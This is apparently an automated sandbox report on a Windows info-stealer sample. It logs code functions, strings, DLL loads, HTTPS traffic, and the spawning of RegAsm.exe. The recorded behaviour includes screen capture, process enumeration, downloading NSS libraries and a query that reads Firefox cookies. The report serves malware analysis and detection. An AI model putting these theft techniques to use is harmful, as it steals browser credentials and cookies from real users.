                    Source: unknownHTTPS traffic detected: 23.47.27.74:443 -> 192.168.2.6:49699 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 95.217.244.99:443 -> 192.168.2.6:49701 version: TLS 1.2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00411DF0 memset,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,1_2_00411DF0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0053C0C30_2_0053C0C3
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004C031C0_2_004C031C
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004C07480_2_004C0748
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0053C79F0_2_0053C79F
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004C0B620_2_004C0B62
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004C0FD30_2_004C0FD3
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004C14570_2_004C1457
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004994B10_2_004994B1
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004994B10_2_004994B1
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004C18C80_2_004C18C8
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0047DC820_2_0047DC82
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0053DCA80_2_0053DCA8
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0047DC820_2_0047DC82
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004C1D060_2_004C1D06
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D60200_2_004D6020
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004C21570_2_004C2157
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E245B0_2_004E245B
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004DA4A30_2_004DA4A3
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004C25950_2_004C2595
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D66900_2_004D6690
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004DA4A30_2_004DA4A3
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F293F0_2_004F293F
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D29FB0_2_004D29FB
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004C2ABE0_2_004C2ABE
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D6BD00_2_004D6BD0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F6B8F0_2_004F6B8F
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00452CAC0_2_00452CAC
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004526DF0_2_004526DF
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00452CAC0_2_00452CAC
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004C2FFA0_2_004C2FFA
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00452CAC0_2_00452CAC
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00452CAC0_2_00452CAC
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E335B0_2_004E335B
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0053B6210_2_0053B621
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D37900_2_004D3790
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0053BB720_2_0053BB72
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0049FDC80_2_0049FDC8
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004BFF020_2_004BFF02
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0041D2091_2_0041D209
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0041E3871_2_0041E387
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0041D75A1_2_0041D75A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0041F8901_2_0041F890
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19C54CF01_2_19C54CF0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19CF59401_2_19CF5940
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19C41C9E1_2_19C41C9E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19C420181_2_19C42018
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19D69A201_2_19D69A20
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19DA9CC01_2_19DA9CC0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19C4292D1_2_19C4292D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19C71C501_2_19C71C50
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19C412A81_2_19C412A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19C42AA91_2_19C42AA9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19D650401_2_19D65040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19C590001_2_19C59000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19C435801_2_19C43580
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19CD53B01_2_19CD53B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19E1D2091_2_19E1D209
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19C4D4C01_2_19C4D4C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19DA94301_2_19DA9430
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19CFD6D01_2_19CFD6D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19CE96901_2_19CE9690
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19C4C8001_2_19C4C800
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19C41EF11_2_19C41EF1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19D44A601_2_19D44A60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19C68D2A1_2_19C68D2A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19C7CE101_2_19C7CE10
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19CC81201_2_19CC8120
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19CC00901_2_19CC0090
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19D680301_2_19D68030
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19C43AB21_2_19C43AB2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19D804801_2_19D80480
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19C687631_2_19C68763
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19CA47601_2_19CA4760
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19CD87601_2_19CD8760
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19C686801_2_19C68680
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19C4251D1_2_19C4251D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19C778101_2_19C77810
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19C6BAB01_2_19C6BAB0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19C4290A1_2_19C4290A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19C4F1601_2_19C4F160
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19C4174E1_2_19C4174E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19C733701_2_19C73370
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19D269C01_2_19D269C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19D3A9401_2_19D3A940
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19D5A9001_2_19D5A900
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19C4481D1_2_19C4481D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19C43E3B1_2_19C43E3B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19D7E8001_2_19D7E800
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19C4EA801_2_19C4EA80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19C4AA401_2_19C4AA40
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19C419DD1_2_19C419DD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19CA2EE01_2_19CA2EE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19C86E801_2_19C86E80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19E1AEBE1_2_19E1AEBE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19C4209F1_2_19C4209F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19CCA0B01_2_19CCA0B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19D3A5901_2_19D3A590
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19C6A5601_2_19C6A560
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19C447AF1_2_19C447AF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19C566C01_2_19C566C0
                    Source: C:\Users\user\Desktop\file.exeCode function: String function: 00453143 appears 50 times
                    Source: C:\Users\user\Desktop\file.exeCode function: String function: 004522C5 appears 48 times
                    Source: C:\Users\user\Desktop\file.exeCode function: String function: 004E5593 appears 37 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 19E206B1 appears 36 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 19C4395E appears 81 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 19C43AF3 appears 37 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 19C41F5A appears 36 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 19C4415B appears 172 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 19C41C2B appears 47 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004022D0 appears 286 times
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 356
                    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/27@1/2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00410B00 CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,CloseHandle,1_2_00410B00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004110A0 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear,1_2_004110A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\76561199677575543[1].htmJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4092
                    Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\3111af09-48f1-4bec-add3-f56d7b14fdaaJump to behavior
                    Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                    Source: RegAsm.exe, 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2462673623.0000000013EE8000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sqln[1].dll.1.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                    Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                    Source: RegAsm.exe, 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2462673623.0000000013EE8000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sqln[1].dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                    Source: RegAsm.exe, RegAsm.exe, 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2462673623.0000000013EE8000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sqln[1].dll.1.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                    Source: RegAsm.exe, 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2462673623.0000000013EE8000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sqln[1].dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                    Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                    Source: RegAsm.exe, RegAsm.exe, 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2462673623.0000000013EE8000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.1.drBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                    Source: RegAsm.exe, 00000001.00000002.2461606471.000000000144A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies;M
                    Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                    Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                    Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                    Source: RegAsm.exe, 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2462673623.0000000013EE8000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.1.drBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                    Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                    Source: RegAsm.exe, 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2462673623.0000000013EE8000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sqln[1].dll.1.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                    Source: RegAsm.exe, 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2462673623.0000000013EE8000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sqln[1].dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                    Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                    Source: RegAsm.exe, 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2462673623.0000000013EE8000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.1.drBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                    Source: EHIJDHCAKKFCBGCBAAEC.1.dr, IDHIIJJJKEGIDGCBAFIJ.1.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: RegAsm.exe, RegAsm.exe, 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2462673623.0000000013EE8000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.1.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                    Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                    Source: RegAsm.exe, 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2462673623.0000000013EE8000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.1.drBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                    Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                    Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 356
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mozglue.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                    Source: file.exeStatic file information: File size 1135104 > 1048576
                    Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                    Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: mozglue.pdbP source: mozglue.dll.1.dr, mozglue[1].dll.1.dr
                    Source: Binary string: freebl3.pdb source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
                    Source: Binary string: freebl3.pdbp source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
                    Source: Binary string: nss3.pdb@ source: nss3.dll.1.dr, nss3[1].dll.1.dr
                    Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.1.dr, softokn3.dll.1.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.1.dr, vcruntime140.dll.1.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.1.dr, msvcp140[1].dll.1.dr
                    Source: Binary string: C:\5lpar31fck04x\Body.pdb source: file.exe
